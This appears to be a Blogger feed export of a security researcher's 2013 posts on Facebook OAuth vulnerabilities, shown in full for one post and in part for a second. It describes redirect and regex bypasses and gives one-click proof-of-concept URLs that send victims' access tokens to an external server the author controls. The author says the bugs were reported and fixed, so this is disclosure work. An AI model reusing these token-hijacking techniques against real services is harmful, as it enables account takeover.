tag:blogger.com,1999:blog-10254686633709945132024-03-05T08:57:09.315-08:00Nir Goldshlager Web Application Security BlogUnknownnoreply@blogger.comBlogger8125tag:blogger.com,1999:blog-1025468663370994513.post-30156036894476232402013-03-12T23:32:00.000-07:002013-04-04T22:03:21.054-07:00How I Hacked Any Facebook Account...Again!<div class="separator" style="clear: both; text-align: center;"></div><br />
<div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgyUgKVOOC5rZukjd3-6QxoQ5s6yl51bCj7K2oUUmkb7q8GmvnuD71D7t-zMJd80uG4mfvZ6oTl1iLJnnZzFjBEx3dkbimfvRXDE5Fsp0Vq4bWMjUvp7tVKGTluCDueEZ3XRGizdrSS5hs/s1600/HackThePlanet4.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgyUgKVOOC5rZukjd3-6QxoQ5s6yl51bCj7K2oUUmkb7q8GmvnuD71D7t-zMJd80uG4mfvZ6oTl1iLJnnZzFjBEx3dkbimfvRXDE5Fsp0Vq4bWMjUvp7tVKGTluCDueEZ3XRGizdrSS5hs/s400/HackThePlanet4.jpg" width="400" /></a></div><br />
<br />
This is my second post regarding Facebook OAuth Vulnerabilities,<br />
<br />
<b>just to clarify there is no need for any installed apps on the victim's account, Even if the victim has never allowed any application in his Facebook account I could still get full permission on his account via Facebook Messenger app_id (This bug works on any browser),</b><br />
<br />
<b>Also, It's important to mention that there is a special regex protection in Facebook Messenger app_id (app_id=220764691281998),</b><br />
<br />
<b>I was able to bypass it.</b><br />
<br />
<br />
<u><b>Bug 1:</b></u><br />
<br />
Reported this bug at 6/03/2013, Facebook Security Team Fixed it immediately ,<br />
<br />
Also reported more OAuth bugs at 26/02/2013, Facebook Security Team Fixed it very quickly<br />
<br />
Regarding Facebook OAuth Double URL Encoding (Firefox), Reported at 6/02/2013, Fixed it very quickly<br />
<br />
<u><b>Details:</b></u><br />
<br />
So after my first OAuth Vulnerability discovery <a href="http://www.nirgoldshlager.com/2013/02/how-i-hacked-facebook-oauth-to-get-full.html" target="_blank">http://www.nirgoldshlager.com/<wbr></wbr>2013/02/how-i-hacked-facebook-<wbr></wbr>oauth-to-get-full.html</a><br />
<br />
Facebook Security was trying to protect OAuth Token Hijacking attacks by using Regex Protection (%23xxx!,%23/xxx,/)<br />
<br />
Facebook rejected one hash sign request in redirect_uri, next parameter (<b>next=%23/xxxx,next=%23xxx!</b>) to avoid OAuth Attacks,<br />
<br />
<div dir="ltr">Instead, Facebook allow two or more hash sign request in redirect_uri,next parameter (next=<b>%23</b>/xxx/<b>%23</b>/xxx)<br />
<br />
That's because no one was thinking there is a way to exploit Facebook OAuth with Multiple hash sign request<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhMjngYDl1GgLAQrRj4ClWku1CUzS2bGppz81ivbmaR93RyLaoK81Z3WMh9ecOAXcepsXXJHJzH98_V0miWa5gUkZ9AR1CnZujTXjLlYtZ_WjhNboRelskHWxqt65eeRhemYm_qxgLn3hI/s1600/strange-albert-einstein.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhMjngYDl1GgLAQrRj4ClWku1CUzS2bGppz81ivbmaR93RyLaoK81Z3WMh9ecOAXcepsXXJHJzH98_V0miWa5gUkZ9AR1CnZujTXjLlYtZ_WjhNboRelskHWxqt65eeRhemYm_qxgLn3hI/s1600/strange-albert-einstein.JPG" /></a></div><br />
<br />
So Can we exploit OAuth with two hash sign request? (%23/x/%23/xxxx)?,<br />
<br />
The answer is <b>yes</b>!,<br />
<br />
I found that there is a strange behavior of redirection when a user use multiple hash sign request in facebook.com<br />
<br />
<u><b>Multiple Hash Sign Request Example:</b></u><br />
<br />
<a href="http://facebook.com/#/x/%23/messages" target="_blank">facebook.com/#/x/#/messages</a><br />
<br />
Redirect to:<br />
<br />
<a href="http://facebook.com/x/#/messages/" target="_blank">http://facebook.com/x/#/<wbr></wbr>messages/</a><br />
<br />
And:<br />
<br />
<a href="http://facebook.com/x/#/messages/" target="_blank">http://facebook.com/x/#/<wbr></wbr>messages/</a><br />
<br />
Redirect to:<br />
<br />
<a href="http://facebook.com/messages/" target="_blank">http://facebook.com/messages/</a><br />
<br />
Amazing How Things Works ;)<br />
<br />
Now, After we know that we can use multiple hash sign request (#/xxx/#/xxx)<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjnEdy9Rpv9KNRQ0jvORQl1OhUFRQOKsTLvoHczAT4B0tYnP2tpsXHp9Py-0FrjG2SLu2ZKJk7LBybpBHGf5EzC-3sJ7d4ChqrGyvNZEB7nWZbZYzcWAoE-C24V0JrnI5FSrrXpIG62BPo/s1600/multiplehashsignrequest.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="156" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjnEdy9Rpv9KNRQ0jvORQl1OhUFRQOKsTLvoHczAT4B0tYnP2tpsXHp9Py-0FrjG2SLu2ZKJk7LBybpBHGf5EzC-3sJ7d4ChqrGyvNZEB7nWZbZYzcWAoE-C24V0JrnI5FSrrXpIG62BPo/s320/multiplehashsignrequest.jpg" width="320" /></a></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj_cZTCJnRaoI0mQPR9kfks3c9hPX6Xh1kDvB__CwsBphPsKsIZ7eflyyv9FhA21sJMTgYk_ZyEoboQ4UdSNS1dpFVpJ1jL3s2zUDnglw6gK1jLoorge1uVy9-FRCDjFkCJ86t_CbwQrTU/s1600/multiplehashsignrequest.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><br />
</a></div><br />
<br />
in our redirect_uri, next parameter to bypass the one hash sign (#/xx) regex protection in Facebook OAuth (next=http://facebook.com/#/xxx),<br />
<br />
There is more to it in order to use that behavior to exploit the OAuth Bug once again,</div><div dir="ltr"></div><div dir="ltr"></div><div dir="ltr">I found out that Facebook OAuth rejects unauthorized subdomains in redirect_uri, next parameter,<br />
<u><b><br />
</b></u> <u><b>For example:</b></u><br />
<br />
Facebook allows only subdomains of Facebook Mobile Version,<br />
<br />
Such as:<br />
<br />
<a href="http://touch.facebook.com/" target="_blank">touch.facebook.com</a><br />
<br />
<a href="http://m.facebook.com/" target="_blank">m.facebook.com</a><br />
<br />
<a href="http://0.facebook.com/" target="_blank">0.facebook.com</a><br />
<br />
<br />
But rejects unknown subdomains:<br />
<br />
(<a href="http://aaa.facebook.com/" target="_blank">aaa.facebook.com</a>,<a href="http://bbb.facebook.com/" target="_blank">bbb.<wbr></wbr>facebook.com</a>)+ main domains (<a href="http://facebook.com/" target="_blank">facebook.com</a>,<a href="http://apps.facebook.com/" target="_blank">apps.facebook.<wbr></wbr>com</a>,etc..)<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgznd_UHnrYc9b2zAArK0pWnVcvTtfErmTf4IBhT03uz3C_JTHH4A5pApgpEr5gwbPC5b3NiyWiP9jPvXtbEWV2OPsJTEeRDCDzGbYB-eGaGLSzL7VrTYlE8TZndAJ_wU9EbjkxjCHUfe4/s1600/rejectedomain.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="154" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgznd_UHnrYc9b2zAArK0pWnVcvTtfErmTf4IBhT03uz3C_JTHH4A5pApgpEr5gwbPC5b3NiyWiP9jPvXtbEWV2OPsJTEeRDCDzGbYB-eGaGLSzL7VrTYlE8TZndAJ_wU9EbjkxjCHUfe4/s320/rejectedomain.jpg" width="320" /></a></div></div><div dir="ltr"><br />
<b>Again, Bad News!</b></div><div dir="ltr"></div><div dir="ltr">That's Because In any mobile version of Facebook (<a href="http://touch.facebook.com/" target="_blank">touch.facebook.com</a>,<a href="http://m.facebook.com/" target="_blank">m.<wbr></wbr>facebook.com</a>,<a href="http://0.facebook.com/" target="_blank">0.facebook.com</a>), <b>We won't see the multiple hash sign behaviour in our reques</b>t<br />
<br />
<u><b>For Example:</b></u><br />
<br />
<a href="https://touch.facebook.com/#%21/xx/%23%21/messages" target="_blank">https://touch.facebook.com/#/<wbr></wbr>xx/#!messages</a><u><b> </b></u><br />
<br />
<a href="https://touch.facebook.com/#%21/xx/%23%21/messages" target="_blank">https://touch.facebook.com/#!/<wbr></wbr>xx/#!/messages</a><br />
<br />
This request will not be valid, Will not redirect us to the messages screen,<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjYnBvV4fmcXM_p1Nkp-iU8Xdohxg6TVpMTDNy4S85B4CyzwTfNkcDPdURhBgHW6h4p4X5U7tfY-h9JNnkjRwtPcyi4zCLpJmku7tctK2qg1X4JKBM5B0w-6CImo4j0dr9rjK9vqooSa0c/s1600/51514_houston-we-have-a-problem.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="279" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjYnBvV4fmcXM_p1Nkp-iU8Xdohxg6TVpMTDNy4S85B4CyzwTfNkcDPdURhBgHW6h4p4X5U7tfY-h9JNnkjRwtPcyi4zCLpJmku7tctK2qg1X4JKBM5B0w-6CImo4j0dr9rjK9vqooSa0c/s320/51514_houston-we-have-a-problem.jpg" width="320" /></a></div><br />
<br />
Anyway, I need a subdomain like the same official domain of facebook.com,<br />
<br />
I need it to exploit the strange redirection behavior with multiple hash sign request (#/xx/#/xx) under facebook.com</div><div dir="ltr">At first sight it seems that facebook rejects any subdomain except the mobile subdomain version (touch.facebook.com,etc...),<br />
<br />
I found that if I use <b>facebook as a subdomain (facebook.facebook.com)</b>, I can bypass this protection,<br />
<br />
<b><span style="font-size: large;">Sometimes the answer is right in front of you :)<span style="font-size: large;">.</span></span></b></div><div dir="ltr"></div><div dir="ltr"><br />
</div><div dir="ltr"></div><div dir="ltr"></div><div dir="ltr"></div><div dir="ltr"><b>Wait a second!,</b><br />
<br />
For now it seems that I can access to files / directories in <a href="http://facebook.com/" target="_blank">facebook.com via the redirect_uri,next parameter right?</a>, </div><div dir="ltr"></div><div dir="ltr">But i can't access my app that redirect victims to the attacker's external website (files.nirgoldshlager.com) , To Save the access_token of the victim,<br />
That's Because my "malicious" App located at <a href="http://touch.facebok.com/apps/xxx" target="_blank">touch.facebok.com/apps/xxx</a>, <a href="http://apps.facebook.com/apps/xxxx" target="_blank">apps.facebook.com/apps/xxxx</a><br />
<br />
</div><div dir="ltr"></div><div dir="ltr">I thought of a few ways to exploit this situation,<br />
<br />
<b>1.</b><br />
<br />
Create a Page Tab in Facebook Page that redirect to external website (<a href="http://files.nirgoldshlager.com/" target="_blank">files.nirgoldshlager.com</a>),<br />
<br />
<b>2</b>.<br />
<br />
Try to access my app from facebook.com domain<a href="http://facebook.com/" target="_blank"><br />
</a><br />
<br />
<b>3.</b><br />
<br />
Find a Site Redirection Vulnerability in <a href="http://facebook.com/" target="_blank">facebook.com.</a><br />
<br />
<br />
I tried to use my App or Page tab in redirect_uri,next parameter</div><div dir="ltr"></div><div dir="ltr"></div><div dir="ltr"></div><div dir="ltr"><b>For Example:</b><br />
<br />
<b>A.</b><br />
<br />
(My "Malicious" App, Located in facebook.com)<br />
<br />
<a href="https://facebook.com/apps/application.php?id=314021278671363" target="_blank">https://facebook.com/apps/<wbr></wbr>application.php?id=<wbr></wbr>314021278671363</a></div><div dir="ltr"><b>B.</b><br />
<br />
(Page Tab that redirect to external website, Located in facebook.com)<br />
<br />
<a href="https://www.facebook.com/Goldshlager?v=app_185356844859770" target="_blank">https://www.facebook.com/<wbr></wbr>Goldshlager?v=app_<wbr></wbr>185356844859770</a><br />
<br />
<b>Bad news again!</b><br />
<br />
I cant use this methods because there is to much redirection process in this attack,<br />
<br />
The Access_token of the victim will not be sent to an external site after 3 redirection requests in GET URL, That's sucks!<br />
<br />
I was thinking again, Maybe there is some way to redirect the victim directly to my app located in <a href="http://touch.facebook.com/apps/myapp" target="_blank">touch.facebook.com/apps/myapp</a> to limit the redirection process to three times for example.<br />
<br />
So, I found that there is a file called l.php in <a href="http://facebook.com/" target="_blank">facebook.com</a>, I'm sure most of you familiar with this file,<br />
<br />
This file is responsible of redirecting people to external websites, In this case Facebook provide a warning message, Ask the user to confirm the redirection before they redirect him,<br />
<br />
Seems I'm lost again, <br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhsSoQiYGyZNelQq-HRHwIaRmLkO8NjSbZsW1t83gB4RN28CwZ8mlUTeE7SkL_RUycBblpglYuZO_nujUaa0RZkGlN0YCEn8MgCZG4UXiMZuMtTKeYA5RcQttn8CDajogUeZDf1T2wxCm4/s1600/warnning.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="154" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhsSoQiYGyZNelQq-HRHwIaRmLkO8NjSbZsW1t83gB4RN28CwZ8mlUTeE7SkL_RUycBblpglYuZO_nujUaa0RZkGlN0YCEn8MgCZG4UXiMZuMtTKeYA5RcQttn8CDajogUeZDf1T2wxCm4/s320/warnning.jpg" width="320" /></a></div><br />
<br />
I found that if i use 5 byte before the external website in l.php,<br />
<br />
I can bypass this warning message when i redirect the victim to subdomains of <a href="http://facebook.com/" target="_blank">facebook.com</a><br />
<br />
<u><b>For example:</b></u><br />
<br />
<b>Warning message:</b><br />
<br />
<a href="https://www.facebook.com/l/;touch.facebook.com/apps/sdfsdsdsgs" target="_blank">https://www.facebook.com/l/;<wbr></wbr>touch.facebook.com/apps/<wbr></wbr>sdfsdsdsgs</a><br />
<br />
<b>Bypass warning message</b> <b>by using 5 byte</b> , Redirect to touch.facebook.com subdomain:<br />
<br />
<a href="https://www.facebook.com/l/ggggg;touch.facebook.com/apps/sdfsdsdsgs" target="_blank">https://www.facebook.com/l/<wbr></wbr>goldy;touch.facebook.com/apps/<wbr></wbr>sdfsdsdsgs</a><br />
<br />
Cool!,<br />
<br />
Now lets combine all of these methods to bypass Facebook OAuth,<br />
<br />
<u><b><span class="short_text" id="result_box" lang="en"><span class="hps">Exploit Summary</span></span></b></u><br />
<br />
<b>1. </b><br />
<br />
Using <a href="http://facebook.facebook.com/" target="_blank">facebook.facebook.com</a> subdomain to bypass subdomain regex protection in OAuth (<a href="http://facebook.facebook.com/" target="_blank">facebook.facebook.com</a>)<br />
<br />
<b>2.</b><br />
<br />
Exploit the strange redirection behavior in <a href="http://facebook.com/" target="_blank">facebook.com</a> with multiple hash signs (<a href="https://facebook.facebook.com/#/x/%23/l/ggggg;touch.facebook.com/apps/sdfsdsdsgs" target="_blank">https://facebook.facebook.<wbr></wbr>com/#/x/#/l/ggggg;touch.<wbr></wbr>facebook.com/apps/sdfsdsdsgs</a>)<br />
<br />
<b>3.</b><br />
<br />
Bypass the warning message in l.php with 5 byte (<a href="https://www.facebook.com/l/ggggg;touch.facebook.com" target="_blank">https://www.facebook.com/l/<wbr></wbr>ggggg;touch.facebook.com</a>)<br />
<br />
<b>4.</b><br />
<br />
Redirect the victim to external websites located in <a href="http://files.nirgoldshlager.com/" target="_blank">files.nirgoldshlager.com via my Facebook app</a>, To save the victim access_token in a log file <br />
<br />
<u><b>Final PoC One Click (Works On All Browsers, Bypass 2-STEP Verification, Access token never expired until the victim changed his password):</b></u><br />
<br />
<a href="https://www.facebook.com/connect/uiserver.php?app_id=220764691281998&next=https://facebook.facebook.com/%23/x/%23/l/ggggg%3btouch.facebook.com/apps/sdfsdsdsgs%23&display=page&fbconnect=1&method=permissions.request&response_type=token" target="_blank">https://www.facebook.com/<wbr></wbr>connect/uiserver.php?app_id=<wbr></wbr>220764691281998&next=https://<wbr></wbr>facebook.facebook.com/%23/x/%<wbr></wbr>23/l/ggggg%3btouch.facebook.<wbr></wbr>com/apps/sdfsdsdsgs%23&<wbr></wbr>display=page&fbconnect=1&<wbr></wbr>method=permissions.request&<wbr></wbr>response_type=token</a><br />
<br />
<br />
<u><b><span style="font-family: arial,sans-serif; font-size: 13px;">Full description of permission for Facebook Messenger Access Token:</span></b></u><br />
<br />
<span style="font-family: arial,sans-serif; font-size: 13px;">ads_management create_event create_note email export_stream manage_friendlists manage_groups manage_notifications manage_pages offline_access photo_upload publish_actions publish_checkins publish_stream read_friendlists read_insights read_mailbox read_page_mailboxes read_requests read_stream rsvp_event share_item sms status_update video_upload xmpp_login</span><br />
<br />
<br />
And???<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhAjmGjaxdrehp2zY9YrLufDVsZ8jdfR0kSVx4LYiJCcFcKh5eRZV0BkWW_nBwAo-Kw__Ia8F6tz_Bx4upM28S8F32kEFTaXcCpZCFhyphenhyphen4nEByhouRYQb-SgEKBCmgXHL5WJf_ctesVKPhw/s1600/gameover.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="210" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhAjmGjaxdrehp2zY9YrLufDVsZ8jdfR0kSVx4LYiJCcFcKh5eRZV0BkWW_nBwAo-Kw__Ia8F6tz_Bx4upM28S8F32kEFTaXcCpZCFhyphenhyphen4nEByhouRYQb-SgEKBCmgXHL5WJf_ctesVKPhw/s400/gameover.jpg" width="400" /></a></div><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
</div><div dir="ltr"><u><b>Bug 2.</b></u><br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiheH51Zu6rb6RbC1H2antntqJYcgTS47lKAzp79R-MwTjdg0sOoBejWsdLLDUGhucAizjrieGkSTOfA8-idiD5LWf25DtfZUS5c7i7J61wdMj6LsvdleOoPBkpdAkB6uRoX1gpU6jIySo/s1600/firefox1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiheH51Zu6rb6RbC1H2antntqJYcgTS47lKAzp79R-MwTjdg0sOoBejWsdLLDUGhucAizjrieGkSTOfA8-idiD5LWf25DtfZUS5c7i7J61wdMj6LsvdleOoPBkpdAkB6uRoX1gpU6jIySo/s320/firefox1.jpg" width="226" /></a></div><br />
<br />
This bug was fixed a few weeks ago,<br />
<br />
I wanted to find something unique for Facebook users that are using Firefox Browser!,<br />
<br />
I found that an attacker is able to encode his payload with Double URL Encoding (%25xx) to attack Facebook users under Firefox Browser and bypass Facebook OAuth regex protection.<br />
<br />
This behavior bypasses the hash sign regex protection in <a href="http://facebook.com/" target="_blank">touch.facebook.com, facebook.com</a> , <a href="http://x.facebook.com/" target="_blank">x.facebook.com,etc..</a><br />
<br />
<b>PoC:</b><br />
<br />
<a href="https://www.facebook.com/dialog/permissions.request?app_id=220764691281998&display=page&next=https%3A%2F%2Ftouch.facebook.com%2F%2523%2521%2Fapps%2Ftestestestte%2F&response_type=token&perms=email&fbconnect=1" target="_blank">https://www.facebook.com/<wbr></wbr>dialog/permissions.request?<wbr></wbr>app_id=220764691281998&<wbr></wbr>display=page&next=https%3A%2F%<wbr></wbr>2Ftouch.facebook.com%2F%2523%<wbr></wbr>2521%2Fapps%2Ftestestestte%2F&<wbr></wbr>response_type=token&perms=<wbr></wbr>email&fbconnect=1</a></div><div dir="ltr"><br />
<br />
BTW.<br />
<br />
If you want to use OAuth 2.0 in your own web site, You can look at Egor Homakov <a href="https://twitter.com/homakov" target="_blank">@homakov</a> post (<a href="http://homakov.blogspot.co.il/2013/03/redirecturi-is-achilles-heel-of-oauth.html" target="_blank">http://homakov.blogspot.co.il/2013/03/redirecturi-is-achilles-heel-of-oauth.html)</a>, that <span class="short_text" id="result_box" lang="en"><span class="hps">shows how</span> <span class="hps">to fix</span> <span class="hps">these vulnerabilities</span></span> in OAuth 2.0,<br />
<br />
Also please read the risks regarding OAuth 2.0 before you use it in your own site <br />
<br />
<a href="http://tools.ietf.org/html/rfc6749#page-60" target="_blank">http://tools.ietf.org/html/rfc6749#page-60</a><br />
<br />
<br />
See you next time :)<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBkbQtAb3l9xMIatLmVT7q_pFw7e9Xt-UIbxnStcGy_KckSvfIvHAaFECRG3mfsJjnjsxqNeJ31-SJ0uwSEz7PkRrGeUvwKJ1IfDPg7BSa94SF5DR2c3dtMbcu_PTPcv-_vV8dzjaeldU/s1600/gameovergil.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><br />
</a></div></div>Unknownnoreply@blogger.com10tag:blogger.com,1999:blog-1025468663370994513.post-38504772098872457492013-02-21T07:18:00.001-08:002013-04-04T22:03:34.530-07:00How I Hacked Facebook OAuth To Get Full Permission On Any Facebook Account (Without App "Allow" Interaction)<div style="direction: ltr;"><span style="font-family: arial,sans-serif; font-size: 13px;">Hi,</span></div><div style="direction: ltr;"><br />
<span style="font-family: arial,sans-serif; font-size: 13px;">I decided to share one of my favorite flaws i discovered in </span><a href="http://facebook.com/" style="font-family: arial,sans-serif; font-size: 13px;" target="_blank">facebook.com</a><span style="font-family: arial,sans-serif; font-size: 13px;">,</span> </div><div style="direction: ltr;"></div><div style="direction: ltr;"></div><div style="direction: ltr;"><span style="font-family: arial,sans-serif; font-size: 13px;">This flaw allowed me to take a full control over any Facebook account,</span><br />
<span style="font-family: arial,sans-serif; font-size: 13px;"> </span><span style="font-family: arial,sans-serif; font-size: 13px;"> </span><br />
<span style="font-family: arial,sans-serif; font-size: 13px;">By exploiting this flaw I could steal unique access tokens that provides me full control over any Facebook account,</span></div><div dir="ltr"><span style="font-family: arial,sans-serif; font-size: 13px;"> </span><b><span style="font-family: arial,sans-serif; font-size: 13px;"> </span></b></div><div dir="ltr"><b><span style="font-family: arial,sans-serif; font-size: 13px;">just to clarify </span><span style="font-family: arial,sans-serif; font-size: 13px;">there is no need for any installed apps on the victim's account,</span><span style="font-family: arial,sans-serif; font-size: 13px;"> </span><span style="font-family: arial,sans-serif; font-size: 13px;">Even if the victim never allowed any application in his Facebook account, I could still be getting full permissions (This bug works on any browser)</span></b></div><div style="direction: ltr;"><br />
<span style="font-family: arial,sans-serif; font-size: 13px;">To make this exploit work, The victim only need to visit a webpage,</span><br />
<span style="font-family: arial,sans-serif; font-size: 13px;">So OAuth is used by Facebook to communicate between Applications and Facebook users,</span> <span style="font-family: arial,sans-serif; font-size: 13px;">Usally users must allow/accept the application request to access their account before the communication can start.</span></div><div style="direction: ltr;"><br />
<span style="font-family: arial,sans-serif; font-size: 13px;"></span><span style="font-family: arial,sans-serif; font-size: 13px;">Any Facebook application might ask for different permissions,</span></div><div style="direction: ltr;"><br style="font-family: arial,sans-serif; font-size: 13px;" /> <u><b><span style="font-family: arial,sans-serif; font-size: 13px;">For example:</span><span style="font-family: arial,sans-serif; font-size: 13px;"> </span></b></u></div><div style="direction: ltr;"></div><div style="direction: ltr;"><br />
<span style="font-family: arial,sans-serif; font-size: 13px;">Diamond Dash,Texas Holdem Poker only have permission to basic information and post on user's wall,</span><br />
<br />
</div><div style="direction: ltr;"></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhVyLlLLJle39sszaatFP_DK1riutvR5KcuVHkrnFWEAvLy9h5NpF8ztWb_U_qEN6cBsuIObdUo8tfz4BrRZPLOD2bw7MBm6ccaxduvJmHHD0J0IODh1i3Mb-BI0QYUrqxZDmVxAXHUnhQ/s1600/nadia+oauth+diamond+dash.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="147" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhVyLlLLJle39sszaatFP_DK1riutvR5KcuVHkrnFWEAvLy9h5NpF8ztWb_U_qEN6cBsuIObdUo8tfz4BrRZPLOD2bw7MBm6ccaxduvJmHHD0J0IODh1i3Mb-BI0QYUrqxZDmVxAXHUnhQ/s320/nadia+oauth+diamond+dash.jpg" width="320" /></a></div><div style="direction: ltr;"></div><div style="direction: ltr;"></div><div style="direction: ltr;"><br />
<br />
<span style="font-family: arial,sans-serif; font-size: 13px;">I found a way in to get a full permissions (read inbox, outbox, manage pages, manage ads, read private photos, videos,etc..) over the victim account even without any installed apps on the victim's account,</span> </div><div style="direction: ltr;"><span style="font-family: arial,sans-serif; font-size: 13px;">Another advantage in the flaw I found is that there is no "Expired date" of the Token like there would be on any other application usage, In my attack the token never expires unless the victim change his password :),</span><br />
<span style="font-family: arial,sans-serif; font-size: 13px;"> </span><span style="font-family: arial,sans-serif; font-size: 13px;"> </span></div><div style="direction: ltr;"><span style="font-family: arial,sans-serif; font-size: 13px;">So, The URL of the OAuth dialog look like this:</span><br />
<br style="font-family: arial,sans-serif; font-size: 13px;" /> <span style="font-family: arial,sans-serif; font-size: 13px;"></span><a href="https://www.facebook.com/dialog/oauth/?app_id=YOUR_APP_ID&next=YOUR_REDIRECT_URL&state=YOUR_STATE_VALUE&scope=COMMA_SEPARATED_LIST_OF_PERMISSION_NAMES" style="font-family: arial,sans-serif; font-size: 13px;" target="_blank">https://www.facebook.com/<wbr></wbr>dialog/oauth/?app_id=YOUR_APP_<wbr></wbr>ID&next=YOUR_REDIRECT_URL&<wbr></wbr>state=YOUR_STATE_VALUE&scope=<wbr></wbr>COMMA_SEPARATED_LIST_OF_<wbr></wbr>PERMISSION_NAMES</a></div><div style="direction: ltr;"><br style="font-family: arial,sans-serif; font-size: 13px;" /> <span style="font-family: arial,sans-serif; font-size: 13px;">Every application in Facebook have different app_id, For example 'Diamond Dash' will be app_id=2, And 'Texas Holdem Poker' will be app_id=3</span><br />
<br style="font-family: arial,sans-serif; font-size: 13px;" /> <span style="font-family: arial,sans-serif; font-size: 13px;">The next,redirect_uri parameter (next=,redirect_uri=), only accepts the owner app domain,</span></div><div style="direction: ltr;"></div><div style="direction: ltr;"><span style="font-family: arial,sans-serif; font-size: 13px;">For example app_id=2389801228 belongs to 'Texas Holdem Poker' app, So the 'next' parameter will allow only </span><a href="http://zynga.com/" style="font-family: arial,sans-serif; font-size: 13px;" target="_blank">zynga.com</a><span style="font-family: arial,sans-serif; font-size: 13px;"> domain (i.e next=</span><a href="http://zynga.com/" style="font-family: arial,sans-serif; font-size: 13px;" target="_blank">http://zynga.com</a><span style="font-family: arial,sans-serif; font-size: 13px;">),</span><span style="font-family: arial,sans-serif; font-size: 13px;"> </span></div><div style="direction: ltr;"></div><div style="direction: ltr;"><span style="font-family: arial,sans-serif; font-size: 13px;">If the domain is different (</span><a href="http://nirgoldshlager.com/" style="font-family: arial,sans-serif; font-size: 13px;" target="_blank">nirgoldshlager.com</a><span style="font-family: arial,sans-serif; font-size: 13px;">) in the 'next', 'redirect_uri' parameter, Facebook will block this action,</span><br />
<br />
<br />
</div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgPBO3UBTUtDX6bo0qsKBxaOX-74-6Kx8J4ZbRHPhX7yy45hawCtS-kauhK_IAA0k-gTIiSttvQFzYn3DLogxmTR-9KAEKqB6Mz4oCx7oQh8kPRKHRzNzNQXctyrxdXHkxCoQFDbtz0sbU/s1600/facebookblockzynga.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="183" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgPBO3UBTUtDX6bo0qsKBxaOX-74-6Kx8J4ZbRHPhX7yy45hawCtS-kauhK_IAA0k-gTIiSttvQFzYn3DLogxmTR-9KAEKqB6Mz4oCx7oQh8kPRKHRzNzNQXctyrxdXHkxCoQFDbtz0sbU/s320/facebookblockzynga.jpg" width="320" /></a></div><div style="direction: ltr;"></div><div style="direction: ltr;"></div><div style="direction: ltr;"><br />
<br />
<span style="font-family: arial,sans-serif; font-size: 13px;">Facebook perform match between your app_id and your next parameter,</span> <span style="font-family: arial,sans-serif; font-size: 13px;">Facebook also sends the access token via GET request to the owner application after the user allowed it,</span></div><div style="direction: ltr;"><span style="font-family: arial,sans-serif; font-size: 13px;">Now that we know how Facebook OAuth works, Lets talk about my finding,</span><span style="font-family: arial,sans-serif; font-size: 13px;"> </span></div><div style="direction: ltr;"></div><div style="direction: ltr;"><span style="font-family: arial,sans-serif; font-size: 13px;">I started to think of my options, what if i can redirect the application OAuth Request to a different 'NEXT' URL?? First i tried to change the 'next' parameter to a different domain and they block my action,</span></div><div style="direction: ltr;"></div><div style="direction: ltr;"><span style="font-family: arial,sans-serif; font-size: 13px;">Then i tried to change the next parameter to </span><a href="http://facebook.com/" style="font-family: arial,sans-serif; font-size: 13px;" target="_blank">facebook.com</a><span style="font-family: arial,sans-serif; font-size: 13px;"> domain, and got blocked again with general error message,</span><br />
<br />
<br />
